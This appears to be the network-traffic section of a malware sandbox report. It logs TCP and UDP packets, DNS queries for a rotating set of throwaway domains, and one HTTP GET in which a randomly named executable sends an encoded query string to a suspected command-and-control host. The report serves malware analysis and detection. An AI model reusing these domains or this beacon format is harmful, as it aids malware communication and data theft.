Jan 7, 2025 12:24:53.032006025 CET	50025	80	192.168.2.4	47.83.1.90
Jan 7, 2025 12:24:53.037066936 CET	80	50025	47.83.1.90	192.168.2.4
Jan 7, 2025 12:24:53.040097952 CET	50025	80	192.168.2.4	47.83.1.90
Jan 7, 2025 12:24:54.049828053 CET	50026	80	192.168.2.4	47.83.1.90
Jan 7, 2025 12:24:54.054757118 CET	80	50026	47.83.1.90	192.168.2.4
Jan 7, 2025 12:24:54.054817915 CET	50026	80	192.168.2.4	47.83.1.90
Jan 7, 2025 12:24:54.069283009 CET	50026	80	192.168.2.4	47.83.1.90
Jan 7, 2025 12:24:54.074065924 CET	80	50026	47.83.1.90	192.168.2.4
Jan 7, 2025 12:24:58.676512003 CET	80	50026	47.83.1.90	192.168.2.4
Jan 7, 2025 12:24:58.676688910 CET	80	50026	47.83.1.90	192.168.2.4
Jan 7, 2025 12:24:58.680190086 CET	50026	80	192.168.2.4	47.83.1.90
Jan 7, 2025 12:24:58.683974981 CET	50026	80	192.168.2.4	47.83.1.90
Jan 7, 2025 12:24:58.688689947 CET	80	50026	47.83.1.90	192.168.2.4
Jan 7, 2025 12:25:03.749650002 CET	50027	80	192.168.2.4	199.192.21.169
Jan 7, 2025 12:25:03.754446030 CET	80	50027	199.192.21.169	192.168.2.4
Jan 7, 2025 12:25:03.754502058 CET	50027	80	192.168.2.4	199.192.21.169
Jan 7, 2025 12:25:03.793482065 CET	50027	80	192.168.2.4	199.192.21.169
Jan 7, 2025 12:25:03.798281908 CET	80	50027	199.192.21.169	192.168.2.4
Jan 7, 2025 12:25:04.371352911 CET	80	50027	199.192.21.169	192.168.2.4
Jan 7, 2025 12:25:04.371368885 CET	80	50027	199.192.21.169	192.168.2.4
Jan 7, 2025 12:25:04.371432066 CET	50027	80	192.168.2.4	199.192.21.169
Jan 7, 2025 12:25:05.295007944 CET	50027	80	192.168.2.4	199.192.21.169
Jan 7, 2025 12:25:06.360558987 CET	50028	80	192.168.2.4	199.192.21.169
Jan 7, 2025 12:25:06.365421057 CET	80	50028	199.192.21.169	192.168.2.4
Jan 7, 2025 12:25:06.365485907 CET	50028	80	192.168.2.4	199.192.21.169
Jan 7, 2025 12:25:06.401144981 CET	50028	80	192.168.2.4	199.192.21.169
Jan 7, 2025 12:25:06.405956984 CET	80	50028	199.192.21.169	192.168.2.4
Jan 7, 2025 12:25:06.991242886 CET	80	50028	199.192.21.169	192.168.2.4
Jan 7, 2025 12:25:06.991276026 CET	80	50028	199.192.21.169	192.168.2.4
Jan 7, 2025 12:25:06.991338015 CET	50028	80	192.168.2.4	199.192.21.169
Jan 7, 2025 12:25:07.998294115 CET	50028	80	192.168.2.4	199.192.21.169
Jan 7, 2025 12:25:09.021646023 CET	50029	80	192.168.2.4	199.192.21.169
Jan 7, 2025 12:25:09.026639938 CET	80	50029	199.192.21.169	192.168.2.4
Jan 7, 2025 12:25:09.026771069 CET	50029	80	192.168.2.4	199.192.21.169
Jan 7, 2025 12:25:09.042013884 CET	50029	80	192.168.2.4	199.192.21.169
Jan 7, 2025 12:25:09.046900034 CET	80	50029	199.192.21.169	192.168.2.4
Jan 7, 2025 12:25:09.046988010 CET	80	50029	199.192.21.169	192.168.2.4
Jan 7, 2025 12:25:09.046997070 CET	80	50029	199.192.21.169	192.168.2.4
Jan 7, 2025 12:25:09.047004938 CET	80	50029	199.192.21.169	192.168.2.4
Jan 7, 2025 12:25:09.047039032 CET	80	50029	199.192.21.169	192.168.2.4
Jan 7, 2025 12:25:09.047048092 CET	80	50029	199.192.21.169	192.168.2.4
Jan 7, 2025 12:25:09.047060013 CET	80	50029	199.192.21.169	192.168.2.4
Jan 7, 2025 12:25:09.047079086 CET	80	50029	199.192.21.169	192.168.2.4
Jan 7, 2025 12:25:09.047207117 CET	80	50029	199.192.21.169	192.168.2.4
Jan 7, 2025 12:25:09.668740988 CET	80	50029	199.192.21.169	192.168.2.4
Jan 7, 2025 12:25:09.668781042 CET	80	50029	199.192.21.169	192.168.2.4
Jan 7, 2025 12:25:09.669229984 CET	50029	80	192.168.2.4	199.192.21.169
Jan 7, 2025 12:25:10.545032024 CET	50029	80	192.168.2.4	199.192.21.169
Jan 7, 2025 12:25:11.563913107 CET	50030	80	192.168.2.4	199.192.21.169
Jan 7, 2025 12:25:11.568928003 CET	80	50030	199.192.21.169	192.168.2.4
Jan 7, 2025 12:25:11.572014093 CET	50030	80	192.168.2.4	199.192.21.169
Jan 7, 2025 12:25:11.583911896 CET	50030	80	192.168.2.4	199.192.21.169
Jan 7, 2025 12:25:11.588664055 CET	80	50030	199.192.21.169	192.168.2.4
Jan 7, 2025 12:25:12.174269915 CET	80	50030	199.192.21.169	192.168.2.4
Jan 7, 2025 12:25:12.174360037 CET	80	50030	199.192.21.169	192.168.2.4
Jan 7, 2025 12:25:12.174421072 CET	50030	80	192.168.2.4	199.192.21.169
Jan 7, 2025 12:25:12.177428007 CET	50030	80	192.168.2.4	199.192.21.169
Jan 7, 2025 12:25:12.182204008 CET	80	50030	199.192.21.169	192.168.2.4
Jan 7, 2025 12:25:25.267849922 CET	50031	80	192.168.2.4	188.114.97.3
Jan 7, 2025 12:25:25.272663116 CET	80	50031	188.114.97.3	192.168.2.4
Jan 7, 2025 12:25:25.276137114 CET	50031	80	192.168.2.4	188.114.97.3
Jan 7, 2025 12:25:25.291850090 CET	50031	80	192.168.2.4	188.114.97.3
Jan 7, 2025 12:25:25.296600103 CET	80	50031	188.114.97.3	192.168.2.4
Jan 7, 2025 12:25:25.847577095 CET	80	50031	188.114.97.3	192.168.2.4
Jan 7, 2025 12:25:25.847613096 CET	80	50031	188.114.97.3	192.168.2.4
Jan 7, 2025 12:25:25.847624063 CET	80	50031	188.114.97.3	192.168.2.4
Jan 7, 2025 12:25:25.847632885 CET	80	50031	188.114.97.3	192.168.2.4
Jan 7, 2025 12:25:25.847644091 CET	80	50031	188.114.97.3	192.168.2.4
Jan 7, 2025 12:25:25.847650051 CET	50031	80	192.168.2.4	188.114.97.3
Jan 7, 2025 12:25:25.847655058 CET	80	50031	188.114.97.3	192.168.2.4
Jan 7, 2025 12:25:25.847664118 CET	50031	80	192.168.2.4	188.114.97.3
Jan 7, 2025 12:25:25.847668886 CET	80	50031	188.114.97.3	192.168.2.4
Jan 7, 2025 12:25:25.847703934 CET	50031	80	192.168.2.4	188.114.97.3
Jan 7, 2025 12:25:25.847747087 CET	80	50031	188.114.97.3	192.168.2.4
Jan 7, 2025 12:25:25.847789049 CET	50031	80	192.168.2.4	188.114.97.3
Jan 7, 2025 12:25:26.795834064 CET	50031	80	192.168.2.4	188.114.97.3
Jan 7, 2025 12:25:27.814176083 CET	50032	80	192.168.2.4	188.114.97.3
Jan 7, 2025 12:25:27.819108009 CET	80	50032	188.114.97.3	192.168.2.4
Jan 7, 2025 12:25:27.819173098 CET	50032	80	192.168.2.4	188.114.97.3
Jan 7, 2025 12:25:27.833416939 CET	50032	80	192.168.2.4	188.114.97.3
Jan 7, 2025 12:25:27.838211060 CET	80	50032	188.114.97.3	192.168.2.4
Jan 7, 2025 12:25:28.403151035 CET	80	50032	188.114.97.3	192.168.2.4
Jan 7, 2025 12:25:28.403182030 CET	80	50032	188.114.97.3	192.168.2.4
Jan 7, 2025 12:25:28.403212070 CET	80	50032	188.114.97.3	192.168.2.4
Jan 7, 2025 12:25:28.403223038 CET	80	50032	188.114.97.3	192.168.2.4
Jan 7, 2025 12:25:28.403223991 CET	50032	80	192.168.2.4	188.114.97.3
Jan 7, 2025 12:25:28.403234005 CET	80	50032	188.114.97.3	192.168.2.4
Jan 7, 2025 12:25:28.403244972 CET	80	50032	188.114.97.3	192.168.2.4
Jan 7, 2025 12:25:28.403255939 CET	80	50032	188.114.97.3	192.168.2.4
Jan 7, 2025 12:25:28.403261900 CET	50032	80	192.168.2.4	188.114.97.3
Jan 7, 2025 12:25:28.403264046 CET	80	50032	188.114.97.3	192.168.2.4
Jan 7, 2025 12:25:28.403275967 CET	50032	80	192.168.2.4	188.114.97.3
Jan 7, 2025 12:25:28.403309107 CET	50032	80	192.168.2.4	188.114.97.3
Jan 7, 2025 12:25:28.404325008 CET	80	50032	188.114.97.3	192.168.2.4
Jan 7, 2025 12:25:28.404375076 CET	50032	80	192.168.2.4	188.114.97.3
Jan 7, 2025 12:25:29.343826056 CET	50032	80	192.168.2.4	188.114.97.3
Jan 7, 2025 12:25:30.360435963 CET	50033	80	192.168.2.4	188.114.97.3
Jan 7, 2025 12:25:30.365326881 CET	80	50033	188.114.97.3	192.168.2.4
Jan 7, 2025 12:25:30.365390062 CET	50033	80	192.168.2.4	188.114.97.3
Jan 7, 2025 12:25:30.379693985 CET	50033	80	192.168.2.4	188.114.97.3
Jan 7, 2025 12:25:30.384598970 CET	80	50033	188.114.97.3	192.168.2.4
Jan 7, 2025 12:25:30.384612083 CET	80	50033	188.114.97.3	192.168.2.4
Jan 7, 2025 12:25:30.384732962 CET	80	50033	188.114.97.3	192.168.2.4
Jan 7, 2025 12:25:30.384741068 CET	80	50033	188.114.97.3	192.168.2.4
Jan 7, 2025 12:25:30.384747982 CET	80	50033	188.114.97.3	192.168.2.4
Jan 7, 2025 12:25:30.384754896 CET	80	50033	188.114.97.3	192.168.2.4
Jan 7, 2025 12:25:30.384763002 CET	80	50033	188.114.97.3	192.168.2.4
Jan 7, 2025 12:25:30.384769917 CET	80	50033	188.114.97.3	192.168.2.4
Jan 7, 2025 12:25:30.384790897 CET	80	50033	188.114.97.3	192.168.2.4
Jan 7, 2025 12:25:30.937256098 CET	80	50033	188.114.97.3	192.168.2.4
Jan 7, 2025 12:25:30.937273979 CET	80	50033	188.114.97.3	192.168.2.4
Jan 7, 2025 12:25:30.937283993 CET	80	50033	188.114.97.3	192.168.2.4
Jan 7, 2025 12:25:30.937319994 CET	50033	80	192.168.2.4	188.114.97.3
Jan 7, 2025 12:25:30.937350988 CET	80	50033	188.114.97.3	192.168.2.4
Jan 7, 2025 12:25:30.937360048 CET	80	50033	188.114.97.3	192.168.2.4
Jan 7, 2025 12:25:30.937374115 CET	80	50033	188.114.97.3	192.168.2.4
Jan 7, 2025 12:25:30.937382936 CET	80	50033	188.114.97.3	192.168.2.4
Jan 7, 2025 12:25:30.937453032 CET	50033	80	192.168.2.4	188.114.97.3
Jan 7, 2025 12:25:30.937458038 CET	80	50033	188.114.97.3	192.168.2.4
Jan 7, 2025 12:25:30.937525034 CET	50033	80	192.168.2.4	188.114.97.3
Jan 7, 2025 12:25:31.888703108 CET	50033	80	192.168.2.4	188.114.97.3
Jan 7, 2025 12:25:32.907538891 CET	50034	80	192.168.2.4	188.114.97.3
Jan 7, 2025 12:25:32.912412882 CET	80	50034	188.114.97.3	192.168.2.4
Jan 7, 2025 12:25:32.919806957 CET	50034	80	192.168.2.4	188.114.97.3
Jan 7, 2025 12:25:32.927809954 CET	50034	80	192.168.2.4	188.114.97.3
Jan 7, 2025 12:25:32.932598114 CET	80	50034	188.114.97.3	192.168.2.4
Jan 7, 2025 12:25:33.504618883 CET	80	50034	188.114.97.3	192.168.2.4
Jan 7, 2025 12:25:33.507267952 CET	80	50034	188.114.97.3	192.168.2.4
Jan 7, 2025 12:25:33.507440090 CET	50034	80	192.168.2.4	188.114.97.3
Jan 7, 2025 12:25:33.511324883 CET	50034	80	192.168.2.4	188.114.97.3
Jan 7, 2025 12:25:33.516158104 CET	80	50034	188.114.97.3	192.168.2.4
Jan 7, 2025 12:25:38.538427114 CET	50035	80	192.168.2.4	47.83.1.90
Jan 7, 2025 12:25:38.543184996 CET	80	50035	47.83.1.90	192.168.2.4
Jan 7, 2025 12:25:38.543266058 CET	50035	80	192.168.2.4	47.83.1.90
Jan 7, 2025 12:25:38.558716059 CET	50035	80	192.168.2.4	47.83.1.90
Jan 7, 2025 12:25:38.563487053 CET	80	50035	47.83.1.90	192.168.2.4
Jan 7, 2025 12:25:40.060492992 CET	50035	80	192.168.2.4	47.83.1.90
Jan 7, 2025 12:25:40.065597057 CET	80	50035	47.83.1.90	192.168.2.4
Jan 7, 2025 12:25:40.065643072 CET	50035	80	192.168.2.4	47.83.1.90
Jan 7, 2025 12:25:41.087773085 CET	50036	80	192.168.2.4	47.83.1.90
Jan 7, 2025 12:25:41.092622995 CET	80	50036	47.83.1.90	192.168.2.4
Jan 7, 2025 12:25:41.092751980 CET	50036	80	192.168.2.4	47.83.1.90
Jan 7, 2025 12:25:41.107777119 CET	50036	80	192.168.2.4	47.83.1.90
Jan 7, 2025 12:25:41.112529993 CET	80	50036	47.83.1.90	192.168.2.4
Jan 7, 2025 12:25:42.607363939 CET	50036	80	192.168.2.4	47.83.1.90
Jan 7, 2025 12:25:42.612694979 CET	80	50036	47.83.1.90	192.168.2.4
Jan 7, 2025 12:25:42.612756014 CET	50036	80	192.168.2.4	47.83.1.90
Jan 7, 2025 12:25:43.627758980 CET	50037	80	192.168.2.4	47.83.1.90
Jan 7, 2025 12:25:43.632653952 CET	80	50037	47.83.1.90	192.168.2.4
Jan 7, 2025 12:25:43.639775038 CET	50037	80	192.168.2.4	47.83.1.90
Jan 7, 2025 12:25:43.651797056 CET	50037	80	192.168.2.4	47.83.1.90
Jan 7, 2025 12:25:43.656687021 CET	80	50037	47.83.1.90	192.168.2.4
Jan 7, 2025 12:25:43.656696081 CET	80	50037	47.83.1.90	192.168.2.4
Jan 7, 2025 12:25:43.656708002 CET	80	50037	47.83.1.90	192.168.2.4
Jan 7, 2025 12:25:43.656714916 CET	80	50037	47.83.1.90	192.168.2.4
Jan 7, 2025 12:25:43.656722069 CET	80	50037	47.83.1.90	192.168.2.4
Jan 7, 2025 12:25:43.656816006 CET	80	50037	47.83.1.90	192.168.2.4
Jan 7, 2025 12:25:43.656822920 CET	80	50037	47.83.1.90	192.168.2.4
Jan 7, 2025 12:25:43.656845093 CET	80	50037	47.83.1.90	192.168.2.4
Jan 7, 2025 12:25:43.656852007 CET	80	50037	47.83.1.90	192.168.2.4
Jan 7, 2025 12:25:45.155337095 CET	50037	80	192.168.2.4	47.83.1.90
Jan 7, 2025 12:25:45.160442114 CET	80	50037	47.83.1.90	192.168.2.4
Jan 7, 2025 12:25:45.160561085 CET	50037	80	192.168.2.4	47.83.1.90
Jan 7, 2025 12:25:46.173243999 CET	50038	80	192.168.2.4	47.83.1.90
Jan 7, 2025 12:25:46.178118944 CET	80	50038	47.83.1.90	192.168.2.4
Jan 7, 2025 12:25:46.178179979 CET	50038	80	192.168.2.4	47.83.1.90
Jan 7, 2025 12:25:46.188036919 CET	50038	80	192.168.2.4	47.83.1.90
Jan 7, 2025 12:25:46.192888975 CET	80	50038	47.83.1.90	192.168.2.4
Jan 7, 2025 12:25:47.802386045 CET	80	50038	47.83.1.90	192.168.2.4
Jan 7, 2025 12:25:47.802511930 CET	80	50038	47.83.1.90	192.168.2.4
Jan 7, 2025 12:25:47.802561998 CET	50038	80	192.168.2.4	47.83.1.90
Jan 7, 2025 12:25:47.805138111 CET	50038	80	192.168.2.4	47.83.1.90
Jan 7, 2025 12:25:47.809866905 CET	80	50038	47.83.1.90	192.168.2.4

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 7, 2025 12:22:34.046278954 CET	57619	53	192.168.2.4	1.1.1.1
Jan 7, 2025 12:22:34.090542078 CET	53	57619	1.1.1.1	192.168.2.4
Jan 7, 2025 12:22:49.611650944 CET	64057	53	192.168.2.4	1.1.1.1
Jan 7, 2025 12:22:49.691345930 CET	53	64057	1.1.1.1	192.168.2.4
Jan 7, 2025 12:22:57.751718044 CET	54938	53	192.168.2.4	1.1.1.1
Jan 7, 2025 12:22:57.764600039 CET	53	54938	1.1.1.1	192.168.2.4
Jan 7, 2025 12:23:49.940152884 CET	56023	53	192.168.2.4	1.1.1.1
Jan 7, 2025 12:23:50.284820080 CET	53	56023	1.1.1.1	192.168.2.4
Jan 7, 2025 12:24:03.408510923 CET	60499	53	192.168.2.4	1.1.1.1
Jan 7, 2025 12:24:04.266710043 CET	53	60499	1.1.1.1	192.168.2.4
Jan 7, 2025 12:24:17.829330921 CET	64087	53	192.168.2.4	1.1.1.1
Jan 7, 2025 12:24:18.499699116 CET	53	64087	1.1.1.1	192.168.2.4
Jan 7, 2025 12:24:32.048966885 CET	53948	53	192.168.2.4	1.1.1.1
Jan 7, 2025 12:24:32.062019110 CET	53	53948	1.1.1.1	192.168.2.4
Jan 7, 2025 12:24:46.357173920 CET	59901	53	192.168.2.4	1.1.1.1
Jan 7, 2025 12:24:46.373641014 CET	53	59901	1.1.1.1	192.168.2.4
Jan 7, 2025 12:25:03.720705032 CET	51996	53	192.168.2.4	1.1.1.1
Jan 7, 2025 12:25:03.735075951 CET	53	51996	1.1.1.1	192.168.2.4
Jan 7, 2025 12:25:17.189114094 CET	49257	53	192.168.2.4	1.1.1.1
Jan 7, 2025 12:25:17.198365927 CET	53	49257	1.1.1.1	192.168.2.4
Jan 7, 2025 12:25:25.251852036 CET	56917	53	192.168.2.4	1.1.1.1
Jan 7, 2025 12:25:25.262412071 CET	53	56917	1.1.1.1	192.168.2.4
Jan 7, 2025 12:25:38.517398119 CET	60671	53	192.168.2.4	1.1.1.1
Jan 7, 2025 12:25:38.535980940 CET	53	60671	1.1.1.1	192.168.2.4
Jan 7, 2025 12:25:52.814104080 CET	55766	53	192.168.2.4	1.1.1.1
Jan 7, 2025 12:25:52.823045969 CET	53	55766	1.1.1.1	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Jan 7, 2025 12:22:34.046278954 CET	192.168.2.4	1.1.1.1	0x82c1	Standard query (0)	www.nosolofichas.online	A (IP address)	IN (0x0001)	false
Jan 7, 2025 12:22:49.611650944 CET	192.168.2.4	1.1.1.1	0x1959	Standard query (0)	www.clubhoodies.shop	A (IP address)	IN (0x0001)	false
Jan 7, 2025 12:22:57.751718044 CET	192.168.2.4	1.1.1.1	0xe606	Standard query (0)	www.maplesyrup7.click	A (IP address)	IN (0x0001)	false
Jan 7, 2025 12:23:49.940152884 CET	192.168.2.4	1.1.1.1	0x9518	Standard query (0)	www.marketyemen.holdings	A (IP address)	IN (0x0001)	false
Jan 7, 2025 12:24:03.408510923 CET	192.168.2.4	1.1.1.1	0x61a8	Standard query (0)	www.y6h6kn.top	A (IP address)	IN (0x0001)	false
Jan 7, 2025 12:24:17.829330921 CET	192.168.2.4	1.1.1.1	0x2335	Standard query (0)	www.x3kwqc5tye4vl90y.top	A (IP address)	IN (0x0001)	false
Jan 7, 2025 12:24:32.048966885 CET	192.168.2.4	1.1.1.1	0xf8f2	Standard query (0)	www.overlayoasis.quest	A (IP address)	IN (0x0001)	false
Jan 7, 2025 12:24:46.357173920 CET	192.168.2.4	1.1.1.1	0x8ad9	Standard query (0)	www.sutbkn.info	A (IP address)	IN (0x0001)	false
Jan 7, 2025 12:25:03.720705032 CET	192.168.2.4	1.1.1.1	0x9aa7	Standard query (0)	www.lonfor.website	A (IP address)	IN (0x0001)	false
Jan 7, 2025 12:25:17.189114094 CET	192.168.2.4	1.1.1.1	0xadf1	Standard query (0)	www.cozythreads.store	A (IP address)	IN (0x0001)	false
Jan 7, 2025 12:25:25.251852036 CET	192.168.2.4	1.1.1.1	0xfd19	Standard query (0)	www.uzshou.world	A (IP address)	IN (0x0001)	false
Jan 7, 2025 12:25:38.517398119 CET	192.168.2.4	1.1.1.1	0x3db7	Standard query (0)	www.cruycq.info	A (IP address)	IN (0x0001)	false
Jan 7, 2025 12:25:52.814104080 CET	192.168.2.4	1.1.1.1	0xffa	Standard query (0)	www.dnft.immo	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Jan 7, 2025 12:22:34.090542078 CET	1.1.1.1	192.168.2.4	0x82c1	No error (0)	www.nosolofichas.online	nosolofichas.online		CNAME (Canonical name)	IN (0x0001)	false
Jan 7, 2025 12:22:34.090542078 CET	1.1.1.1	192.168.2.4	0x82c1	No error (0)	nosolofichas.online		84.32.84.32	A (IP address)	IN (0x0001)	false
Jan 7, 2025 12:22:49.691345930 CET	1.1.1.1	192.168.2.4	0x1959	Name error (3)	www.clubhoodies.shop	none	none	A (IP address)	IN (0x0001)	false
Jan 7, 2025 12:22:57.764600039 CET	1.1.1.1	192.168.2.4	0xe606	No error (0)	www.maplesyrup7.click		188.114.97.3	A (IP address)	IN (0x0001)	false
Jan 7, 2025 12:22:57.764600039 CET	1.1.1.1	192.168.2.4	0xe606	No error (0)	www.maplesyrup7.click		188.114.96.3	A (IP address)	IN (0x0001)	false
Jan 7, 2025 12:23:50.284820080 CET	1.1.1.1	192.168.2.4	0x9518	No error (0)	www.marketyemen.holdings		199.59.243.228	A (IP address)	IN (0x0001)	false
Jan 7, 2025 12:24:04.266710043 CET	1.1.1.1	192.168.2.4	0x61a8	No error (0)	www.y6h6kn.top		162.251.95.62	A (IP address)	IN (0x0001)	false
Jan 7, 2025 12:24:04.266710043 CET	1.1.1.1	192.168.2.4	0x61a8	No error (0)	www.y6h6kn.top		103.23.149.28	A (IP address)	IN (0x0001)	false
Jan 7, 2025 12:24:18.499699116 CET	1.1.1.1	192.168.2.4	0x2335	No error (0)	www.x3kwqc5tye4vl90y.top	zcdn.8383dns.com		CNAME (Canonical name)	IN (0x0001)	false
Jan 7, 2025 12:24:18.499699116 CET	1.1.1.1	192.168.2.4	0x2335	No error (0)	zcdn.8383dns.com		134.122.135.48	A (IP address)	IN (0x0001)	false
Jan 7, 2025 12:24:18.499699116 CET	1.1.1.1	192.168.2.4	0x2335	No error (0)	zcdn.8383dns.com		134.122.133.80	A (IP address)	IN (0x0001)	false
Jan 7, 2025 12:24:32.062019110 CET	1.1.1.1	192.168.2.4	0xf8f2	No error (0)	www.overlayoasis.quest		172.67.148.216	A (IP address)	IN (0x0001)	false
Jan 7, 2025 12:24:32.062019110 CET	1.1.1.1	192.168.2.4	0xf8f2	No error (0)	www.overlayoasis.quest		104.21.55.137	A (IP address)	IN (0x0001)	false
Jan 7, 2025 12:24:46.373641014 CET	1.1.1.1	192.168.2.4	0x8ad9	No error (0)	www.sutbkn.info		47.83.1.90	A (IP address)	IN (0x0001)	false
Jan 7, 2025 12:25:03.735075951 CET	1.1.1.1	192.168.2.4	0x9aa7	No error (0)	www.lonfor.website		199.192.21.169	A (IP address)	IN (0x0001)	false
Jan 7, 2025 12:25:17.198365927 CET	1.1.1.1	192.168.2.4	0xadf1	Name error (3)	www.cozythreads.store	none	none	A (IP address)	IN (0x0001)	false
Jan 7, 2025 12:25:25.262412071 CET	1.1.1.1	192.168.2.4	0xfd19	No error (0)	www.uzshou.world		188.114.97.3	A (IP address)	IN (0x0001)	false
Jan 7, 2025 12:25:25.262412071 CET	1.1.1.1	192.168.2.4	0xfd19	No error (0)	www.uzshou.world		188.114.96.3	A (IP address)	IN (0x0001)	false
Jan 7, 2025 12:25:38.535980940 CET	1.1.1.1	192.168.2.4	0x3db7	No error (0)	www.cruycq.info		47.83.1.90	A (IP address)	IN (0x0001)	false
Jan 7, 2025 12:25:52.823045969 CET	1.1.1.1	192.168.2.4	0xffa	Name error (3)	www.dnft.immo	none	none	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

www.nosolofichas.online

www.maplesyrup7.click

www.marketyemen.holdings

www.y6h6kn.top

www.x3kwqc5tye4vl90y.top

www.overlayoasis.quest

www.sutbkn.info

www.lonfor.website

www.uzshou.world

www.cruycq.info

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49736	84.32.84.32	80	5004	C:\Program Files (x86)\BDSxgArvbsTlxtuJqGeUsrGFgpjfrJAAsRUsOHIejxEVKA\MSNzUrVSel.exe

Timestamp	Bytes transferred	Direction	Data
Jan 7, 2025 12:22:34.108539104 CET	549	OUT	GET /8jia/?Jz1hrtoh=9AvXHUmgXwE0NfntFKmj8Hbm8i5jHRBq7VXsu/oIh+Fo6BAMMd5sC+Z5JULGgnS66o+OMLcPn2vNzZv027oW9RccVG8++KvPU3TKo9usZOkcjq60umoFPYk=&UdJ=uBcLexhXPjVX9H HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8 Accept-Language: en-US Host: www.nosolofichas.online Connection: close User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; InfoPath.3; .NET4.0C; .NET4.0E)
Jan 7, 2025 12:22:34.557862997 CET	1236	IN	HTTP/1.1 200 OK Date: Tue, 07 Jan 2025 11:22:34 GMT Content-Type: text/html Content-Length: 9973 Connection: close Vary: Accept-Encoding Server: hcdn alt-svc: h3=":443"; ma=86400 x-hcdn-request-id: 3bbe617baac8c1da5eeab970abea2113-bos-edge3 Expires: Tue, 07 Jan 2025 11:22:33 GMT Cache-Control: no-cache Accept-Ranges: bytes Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 74 69 74 6c 65 3e 50 61 72 6b 65 64 20 44 6f 6d 61 69 6e 20 6e 61 6d 65 20 6f 6e 20 48 6f 73 74 69 6e 67 65 72 20 44 4e 53 20 73 79 73 74 65 6d 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 20 68 74 74 70 2d 65 71 75 69 76 3d 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 50 61 72 6b 65 64 20 44 6f 6d 61 69 6e 20 6e 61 6d 65 20 6f 6e 20 48 6f 73 74 69 6e 67 65 72 20 44 4e 53 20 73 79 73 74 65 6d 22 20 6e 61 6d 65 3d 64 65 73 63 72 69 70 74 69 6f 6e 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 3e 3c 6c 69 6e 6b 20 68 72 65 66 3d 68 74 74 70 73 3a 2f 2f 6d 61 78 63 64 6e 2e 62 6f 6f 74 73 74 72 61 70 63 64 6e 2e 63 6f 6d 2f 62 6f [TRUNCATED] Data Ascii: <!doctype html><title>Parked Domain name on Hostinger DNS system</title><meta charset=utf-8><meta content="IE=edge,chrome=1" http-equiv=X-UA-Compatible><meta content="Parked Domain name on Hostinger DNS system" name=description><meta content="width=device-width,initial-scale=1" name=viewport><link href=https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/css/bootstrap.min.css rel=stylesheet><script src=https://ajax.googleapis.com/ajax/libs/jquery/3.2.1/jquery.min.js></script><script src=https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/js/bootstrap.min.js></script><link href=https://cdnjs.cloudflare.com/ajax/libs/font-awesome/5.15.3/css/all.min.css rel=stylesheet><link href="https://fonts.googleapis.com/css?family=Open+Sans:300,300i,400,400i,600,600i,700,700i,800,800i&subset=cyrillic,cyrillic-ext,greek,greek-ext,latin-ext,vietnamese" rel=stylesheet><style>html{height:100%}body{font-family:"O
Jan 7, 2025 12:22:34.557879925 CET	1236	IN	Data Raw: 70 65 6e 20 53 61 6e 73 22 2c 48 65 6c 76 65 74 69 63 61 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 23 30 30 30 3b 70 61 64 64 69 6e 67 3a 30 3b 6d 61 72 67 69 6e 3a 30 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 2e 34 32 38 3b 62 61 63 Data Ascii: pen Sans",Helvetica,sans-serif;color:#000;padding:0;margin:0;line-height:1.428;background:linear-gradient(10.7deg,#e9edfb -50.21%,#f6f8fd 31.11%,#fff 166.02%)}h1,h2,h3,h4,h5,h6,p{padding:0;margin:0;color:#333}h1{font-size:30px;font-weight:600!
Jan 7, 2025 12:22:34.557888031 CET	448	IN	Data Raw: 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 33 70 78 3b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 35 70 78 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 35 70 78 7d 2e 6e 61 76 62 61 72 2d 6e 61 76 3e 6c 69 3e 61 3a 68 6f 76 65 72 7b 74 65 78 74 2d 64 65 63 Data Ascii: ;font-size:13px;padding-left:5px;padding-right:5px}.navbar-nav>li>a:hover{text-decoration:none;color:#cdc3ea!important}.navbar-nav>li>a i{margin-right:5px}.nav-bar img{position:relative;top:3px}.congratz{margin:0 auto;text-align:center}.top-co
Jan 7, 2025 12:22:34.557897091 CET	1236	IN	Data Raw: 3b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 35 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 7d 2e 6d 65 73 73 61 67 65 20 70 7b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 34 30 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 3b 6c 69 6e Data Ascii: ;border-radius:5px;position:relative}.message p{font-weight:400;font-size:14px;line-height:24px}#pathName{color:#2f1c6a;font-weight:700;overflow-wrap:break-word;font-size:40px;line-height:48px;margin-bottom:16px}.section-title{color:#2f1c6a;fo
